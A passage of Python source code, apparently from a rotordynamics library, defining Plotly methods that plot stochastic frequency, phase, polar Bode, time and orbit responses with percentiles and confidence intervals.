Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
if units == "m":
y_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
y_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
y_axis_label = "<b>Amplitude (dB)</b>"
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.magnitude, axis=1),
opacity=1.0,
name="Mean",
line=dict(width=3, color="black"),
legendgroup="mean",
hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.magnitude, p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
legendgroup="percentile{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1)
p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
legendgroup="conf{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Frequency</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text=y_axis_label,
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
plot_bgcolor="white",
width=1200,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot_phase(self, percentile=[], conf_interval=[], **kwargs):
"""Plot phase angle response.
This method plots the phase response given an output and an input
using bokeh.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.phase, axis=1),
opacity=1.0,
name="Mean",
line=dict(width=3, color="black"),
legendgroup="mean",
hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.phase, p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
legendgroup="percentile{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"),
**kwargs,
)
)
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.phase, 50 + p / 2, axis=1)
p2 = np.percentile(self.phase, 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
legendgroup="conf{}".format(i),
hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"),
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Frequency</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text="<b>Phase Angle</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
plot_bgcolor="white",
width=1200,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot_polar_bode(
self,
percentile=[],
conf_interval=[],
units="mic-pk-pk",
**kwargs,
):
"""Plot polar forced response using Plotly.
Parameters
----------
dof : int
Degree of freedom.
units : str
Magnitude unit system.
Default is "mic-pk-pk"
polar_kwargs : optional
Additional key word arguments can be passed to change the plot layout only
(e.g. width=1000, height=800, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if units == "m":
r_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
r_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
r_axis_label = "<b>Amplitude (dB)</b>"
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
fig.add_trace(
go.Scatterpolar(
r=np.mean(self.magnitude, axis=1),
theta=np.mean(self.phase, axis=1),
customdata=self.speed_range,
thetaunit="radians",
line=dict(width=3.0, color="black"),
name="Mean",
legendgroup="mean",
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatterpolar(
r=np.percentile(self.magnitude, p, axis=1),
theta=np.percentile(self.phase, p, axis=1),
customdata=self.speed_range,
thetaunit="radians",
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
legendgroup="percentile{}".format(i),
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1)
p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1)
p3 = np.percentile(self.phase, 50 + p / 2, axis=1)
p4 = np.percentile(self.phase, 50 - p / 2, axis=1)
fig.add_trace(
go.Scatterpolar(
r=np.concatenate((p1, p2[::-1])),
theta=np.concatenate((p3, p4[::-1])),
thetaunit="radians",
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
legendgroup="conf{}".format(i),
**kwargs,
)
)
fig.update_layout(
polar=dict(
radialaxis=dict(
title_text=r_axis_label,
title_font=dict(family="Arial", size=14),
gridcolor="lightgray",
exponentformat="power",
),
angularaxis=dict(
tickfont=dict(size=14),
gridcolor="lightgray",
linecolor="black",
linewidth=2.5,
),
),
)
return fig
def plot(self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs):
"""Plot frequency response.
This method plots the frequency and phase response given an output
and an input.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
units : str, optional
Unit system
Default is "mic-pk-pk"
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
fig0 = self.plot_magnitude(percentile, conf_interval, units, **kwargs)
default_values = dict(showlegend=False)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig1 = self.plot_phase(percentile, conf_interval, **kwargs)
fig2 = self.plot_polar_bode(percentile, conf_interval, units, **kwargs)
subplots = make_subplots(
rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]]
)
for data in fig0["data"]:
subplots.add_trace(data, row=1, col=1)
for data in fig1["data"]:
subplots.add_trace(data, row=2, col=1)
for data in fig2["data"]:
subplots.add_trace(data, row=1, col=2)
subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1)
subplots.update_yaxes(fig0.layout.yaxis, row=1, col=1)
subplots.update_xaxes(fig1.layout.xaxis, row=2, col=1)
subplots.update_yaxes(fig1.layout.yaxis, row=2, col=1)
subplots.update_layout(
plot_bgcolor="white",
polar_bgcolor="white",
width=1800,
height=900,
polar=dict(
radialaxis=fig2.layout.polar.radialaxis,
angularaxis=fig2.layout.polar.angularaxis,
),
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return subplots
class ST_TimeResponseResults:
"""Store stochastic results and provide plots for Time Response and Orbit Response.
Parameters
----------
time_range : 1-dimensional array
Time array.
yout : array
System response.
xout : array
Time evolution of the state vector.
nodes_list: array
list with nodes from a rotor model.
nodes_pos: array
Rotor nodes axial positions.
number_dof : int
Number of degrees of freedom per shaft element's node
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
def __init__(self, time_range, yout, xout, number_dof, nodes_list, nodes_pos):
self.time_range = time_range
self.yout = yout
self.xout = xout
self.nodes_list = nodes_list
self.nodes_pos = nodes_pos
self.number_dof = number_dof
def plot_1d(
self, probe, percentile=[], conf_interval=[], fig=None, *args, **kwargs
):
"""Plot time response.
This method plots the time response given a tuple of probes with their nodes
and orientations.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
args : optional
Additional plot axes
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
if fig is None:
fig = go.Figure()
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
for i, p in enumerate(probe):
dofx = p[0] * self.number_dof
dofy = p[0] * self.number_dof + 1
angle = p[1]
# fmt: off
operator = np.array(
[[np.cos(angle), - np.sin(angle)],
[np.cos(angle), + np.sin(angle)]]
)
probe_resp = np.zeros_like(self.yout[:, :, 0])
for j, y in enumerate(self.yout):
_probe_resp = operator @ np.vstack((y[:, dofx], y[:, dofy]))
probe_resp[j] = (
_probe_resp[0] * np.cos(angle) ** 2 +
_probe_resp[1] * np.sin(angle) ** 2
)
# fmt: on
fig.add_trace(
go.Scatter(
x=self.time_range,
y=np.mean(probe_resp, axis=0),
opacity=1.0,
name=f"Probe {i + 1} - Mean",
line=dict(width=3.0),
hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.time_range,
y=np.percentile(probe_resp, p, axis=0),
opacity=0.6,
line=dict(width=2.5),
name=f"Probe {i + 1} - percentile: {p}%",
hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
x = np.concatenate((self.time_range, self.time_range[::-1]))
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_resp, 50 + p / 2, axis=0)
p2 = np.percentile(probe_resp, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1),
fill="toself",
fillcolor=colors1[j],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"),
**kwargs,
)
)
fig.update_xaxes(title_text="<b>Time (s)</b>")
fig.update_yaxes(title_text="<b>Amplitude</b>")
return fig
def plot_2d(self, node, percentile=[], conf_interval=[], fig=None, *args, **kwargs):
"""Plot orbit response (2D).
This function plots orbits for a given node on the rotor system in a 2D view.
Parameters
----------
node : int
Select the node to display the respective orbit response.
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
args : optional
Additional plot axes
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
ndof = self.number_dof
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
if fig is None:
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=np.mean(self.yout[..., ndof * node], axis=0),
y=np.mean(self.yout[..., ndof * node + 1], axis=0),
opacity=1.0,
name="Mean",
line=dict(width=3, color="black"),
hovertemplate=(
"X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=np.percentile(self.yout[..., ndof * node], p, axis=0),
y=np.percentile(self.yout[..., ndof * node + 1], p, axis=0),
opacity=0.6,
line=dict(width=2.5, color=colors2[i]),
name="percentile: {}%".format(p),
hovertemplate=(
"X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.yout[..., ndof * node], 50 + p / 2, axis=0)
p2 = np.percentile(self.yout[..., ndof * node], 50 - p / 2, axis=0)
p3 = np.percentile(self.yout[..., ndof * node + 1], 50 + p / 2, axis=0)
p4 = np.percentile(self.yout[..., ndof * node + 1], 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=np.concatenate((p1, p2[::-1])),
y=np.concatenate((p3, p4[::-1])),
line=dict(width=1, color=colors1[i]),
fill="toself",
fillcolor=colors1[i],
opacity=0.5,
name="confidence interval: {}%".format(p),
hovertemplate=(
"X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}"
),
**kwargs,
)
)
fig.update_xaxes(title_text="<b>Amplitude</b>")
fig.update_yaxes(title_text="<b>Amplitude</b>")
fig.update_layout(title="<b>Rotor Orbit: node {}</b>".format(node)),
return fig
def plot_3d(self, percentile=[], conf_interval=[], fig=None, *args, **kwargs):
"""Plot orbit response (3D).
This function plots orbits for each node on the rotor system in a 3D view.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
args : optional
Additional plot axes
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
ndof = self.number_dof
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
if fig is None:
fig = go.Figure()
line = np.zeros(len(self.nodes_pos))
fig.add_trace(
go.Scatter3d(
x=self.nodes_pos,
y=line,
z=line,
line=dict(width=2.0, color="black", dash="dashdot"),
showlegend=False,
mode="lines",
)
)
for j, n in enumerate(self.nodes_list):
x = np.ones(self.yout.shape[1]) * self.nodes_pos[n]
fig.add_trace(
go.Scatter3d(
x=x,
y=np.mean(self.yout[..., ndof * n], axis=0),
z=np.mean(self.yout[..., ndof * n + 1], axis=0),
line=dict(width=5, color="black"),
name="Mean",
legendgroup="mean",
showlegend=True if j == 0 else False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter3d(
x=x,
y=np.percentile(self.yout[..., ndof * n], p, axis=0),
z=np.percentile(self.yout[..., ndof * n + 1], p, axis=0),
opacity=1.0,
name="percentile: {}%".format(p),
line=dict(width=3, color=colors1[i]),
legendgroup="perc{}".format(p),
showlegend=True if j == 0 else False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
fig.add_trace(
go.Scatter3d(
x=x,
y=np.percentile(self.yout[..., ndof * n], 50 + p / 2, axis=0),
z=np.percentile(
self.yout[..., ndof * n + 1], 50 + p / 2, axis=0
),
line=dict(width=3.5, color=colors1[i]),
opacity=0.6,
name="confidence interval: {}%".format(p),
legendgroup="conf_interval{}".format(p),
showlegend=True if j == 0 else False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
fig.add_trace(
go.Scatter3d(
x=x,
y=np.percentile(self.yout[..., ndof * n], 50 - p / 2, axis=0),
z=np.percentile(
self.yout[..., ndof * n + 1], 50 - p / 2, axis=0
),
line=dict(width=3.5, color=colors1[i]),
opacity=0.6,
name="confidence interval: {}%".format(p),
legendgroup="conf_interval{}".format(p),
showlegend=False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
fig.update_layout(
scene=dict(
xaxis=dict(title=dict(text="<b>Rotor Length</b>"), showspikes=False),
yaxis=dict(title=dict(text="<b>Amplitude - X</b>"), showspikes=False),
zaxis=dict(title=dict(text="<b>Amplitude - Y</b>"), showspikes=False),
),
)
return fig
class ST_ForcedResponseResults:
"""Store stochastic results and provide plots for Forced Response.
Parameters
----------
force_resp : array
Array with the force response for each node for each frequency.
frequency_range : array
Array with the frequencies.
magnitude : array
Magnitude of the frequency response for node for each frequency.
phase : array
Phase of the frequency response for node for each frequency.
number_dof = int
Number of degrees of freedom per shaft element's node.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
def __init__(self, forced_resp, magnitude, phase, frequency_range, number_dof):
self.forced_resp = forced_resp
self.magnitude = magnitude
self.phase = phase
self.frequency_range = frequency_range
self.number_dof = number_dof
def plot_magnitude(
self,
probe,
percentile=[],
conf_interval=[],
fig=None,
units="mic-pk-pk",
**kwargs,
):
"""Plot frequency response.
This method plots the unbalance response magnitude.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0% and 100% inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
units : str, optional
Unit system
Default is "mic-pk-pk".
kwargs : optional
Additional key word arguments can be passed to change the plot layout
(e.g. width=800, height=600, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
Bokeh plot axes with magnitude plot.
"""
if units == "m":
y_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
y_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
y_axis_label = "<b>Amplitude (dB)</b>"
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if fig is None:
fig = go.Figure()
color_i = 0
color_p = 0
for i, p in enumerate(probe):
dofx = p[0] * self.number_dof
dofy = p[0] * self.number_dof + 1
angle = p[1]
# fmt: off
operator = np.array(
[[np.cos(angle), - np.sin(angle)],
[np.cos(angle), + np.sin(angle)]]
)
probe_resp = np.zeros_like(self.magnitude[:, :, 0])
for j, mag in enumerate(self.magnitude):
_probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy]))
probe_resp[i] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 +
(_probe_resp[1] * np.sin(angle)) ** 2)
# fmt: on
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.mean(probe_resp, axis=0),
opacity=1.0,
mode="lines",
line=dict(width=3, color=list(tableau_colors)[i]),
name=f"Probe {i + 1} - Mean",
legendgroup=f"Probe {i + 1} - Mean",
hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}",
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.percentile(probe_resp, p, axis=0),
opacity=0.6,
mode="lines",
line=dict(width=2.5, color=colors1[color_p]),
name=f"Probe {i + 1} - percentile: {p}%",
legendgroup=f"Probe {i + 1} - percentile: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}",
)
)
color_p += 1
x = np.concatenate((self.frequency_range, self.frequency_range[::-1]))
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_resp, 50 + p / 2, axis=0)
p2 = np.percentile(probe_resp, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
mode="lines",
line=dict(width=1, color=colors2[color_i]),
fill="toself",
fillcolor=colors2[color_i],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
legendgroup=f"Probe {i + 1} - confidence interval: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}",
)
)
color_i += 1
fig.update_xaxes(title_text="<b>Frequency</b>")
fig.update_yaxes(title_text=y_axis_label)
fig.update_layout(**kwargs)
return fig
def plot_phase(self, probe, percentile=[], conf_interval=[], fig=None, **kwargs):
"""Plot frequency response.
This method plots the phase response given a set of probes.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
kwargs : optional
Additional key word arguments can be passed to change the plot layout
(e.g. width=800, height=600, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if fig is None:
fig = go.Figure()
color_p = 0
color_i = 0
for i, p in enumerate(probe):
probe_phase = np.zeros_like(self.phase[:, :, 0])
for j, phs in enumerate(self.phase):
aux_phase = phs[:, p[0] * self.number_dof]
probe_phase[i] = np.array(
[i + 2 * np.pi if i < 0 else i for i in aux_phase]
)
angle = p[1]
probe_phase[i] = probe_phase[i] - angle
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.mean(probe_phase, axis=0),
opacity=1.0,
mode="lines",
line=dict(width=3, color=list(tableau_colors)[i]),
name=f"Probe {i + 1} - Mean",
legendgroup=f"Probe {i + 1} - Mean",
hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}",
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.percentile(probe_phase, p, axis=0),
opacity=0.6,
mode="lines",
line=dict(width=2.5, color=colors1[color_p]),
name=f"Probe {i + 1} - percentile: {p}%",
legendgroup=f"Probe {i + 1} - percentile: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}",
)
)
color_p += 1
x = np.concatenate((self.frequency_range, self.frequency_range[::-1]))
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_phase, 50 + p / 2, axis=0)
p2 = np.percentile(probe_phase, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
mode="lines",
line=dict(width=1, color=colors2[color_i]),
fill="toself",
fillcolor=colors2[color_i],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
legendgroup=f"Probe {i + 1} - confidence interval: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}",
)
)
color_i += 1
fig.update_xaxes(title_text="<b>Frequency</b>")
fig.update_yaxes(title_text="<b>Phase Angle</b>")
fig.update_layout(**kwargs),
return fig
def plot_polar_bode(
self,
probe,
percentile=[],
conf_interval=[],
fig=None,
units="mic-pk-pk",
**kwargs,
):
"""Plot polar forced response using Plotly.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
units : str
Magnitude unit system.
Default is "mic-pk-pk"
polar_kwargs : optional
Additional key word arguments can be passed to change the plot layout only
(e.g. width=1000, height=800, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if units == "m":
r_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
r_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
r_axis_label = "<b>Amplitude (dB)</b>"
if fig is None:
fig = go.Figure()
color_p = 0
color_i = 0
for i, p in enumerate(probe):
dofx = p[0] * self.number_dof
dofy = p[0] * self.number_dof + 1
angle = p[1]
# fmt: off
operator = np.array(
[[np.cos(angle), - np.sin(angle)],
[np.cos(angle), + np.sin(angle)]]
)
probe_resp = np.zeros_like(self.magnitude[:, :, 0])
for j, mag in enumerate(self.magnitude):
_probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy]))
probe_resp[i] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 +
(_probe_resp[1] * np.sin(angle)) ** 2)
# fmt: on
probe_phase = np.zeros_like(self.phase[:, :, 0])
for j, phs in enumerate(self.phase):
aux_phase = phs[:, p[0] * self.number_dof]
probe_phase[i] = np.array(
[i + 2 * np.pi if i < 0 else i for i in aux_phase]
)
angle = p[1]
probe_phase[i] = probe_phase[i] - angle
fig.add_trace(
go.Scatterpolar(
r=np.mean(probe_resp, axis=0),
theta=np.mean(probe_phase, axis=0),
customdata=self.frequency_range,
thetaunit="radians",
mode="lines",
line=dict(width=3.0, color=list(tableau_colors)[i]),
name=f"Probe {i + 1} - Mean",
legendgroup=f"Probe {i + 1} - Mean",
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatterpolar(
r=np.percentile(probe_resp, p, axis=0),
theta=np.percentile(probe_phase, p, axis=0),
customdata=self.frequency_range,
thetaunit="radians",
opacity=0.6,
line=dict(width=2.5, color=colors1[color_p]),
name=f"Probe {i + 1} - percentile: {p}%",
legendgroup=f"Probe {i + 1} - percentile{p}",
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
)
)
color_p += 1
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_resp, 50 + p / 2, axis=0)
p2 = np.percentile(probe_resp, 50 - p / 2, axis=0)
p3 = np.percentile(probe_phase, 50 + p / 2, axis=0)
p4 = np.percentile(probe_phase, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatterpolar(
r=np.concatenate((p1, p2[::-1])),
theta=np.concatenate((p3, p4[::-1])),
thetaunit="radians",
line=dict(width=1, color=colors2[color_i]),
fill="toself",
fillcolor=colors2[color_i],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
legendgroup=f"Probe {i + 1} - confidence interval: {p}%",
)
)
color_i += 1
fig.update_layout(
polar=dict(
radialaxis=dict(title_text=r_axis_label, exponentformat="E"),
angularaxis=dict(exponentformat="E"),
),
**kwargs,
)
return fig
def plot(
self,
probe,
percentile=[],
conf_interval=[],
fig=None,
units="mic-pk-pk",
**kwargs,
):
"""Plot frequency response.
This method plots the frequency and phase response given a set of probes.
Parameters
----------
dof : int
Degree of freedom to observe the response.
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
units : str, optional
Unit system
Default is "mic-pk-pk"
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
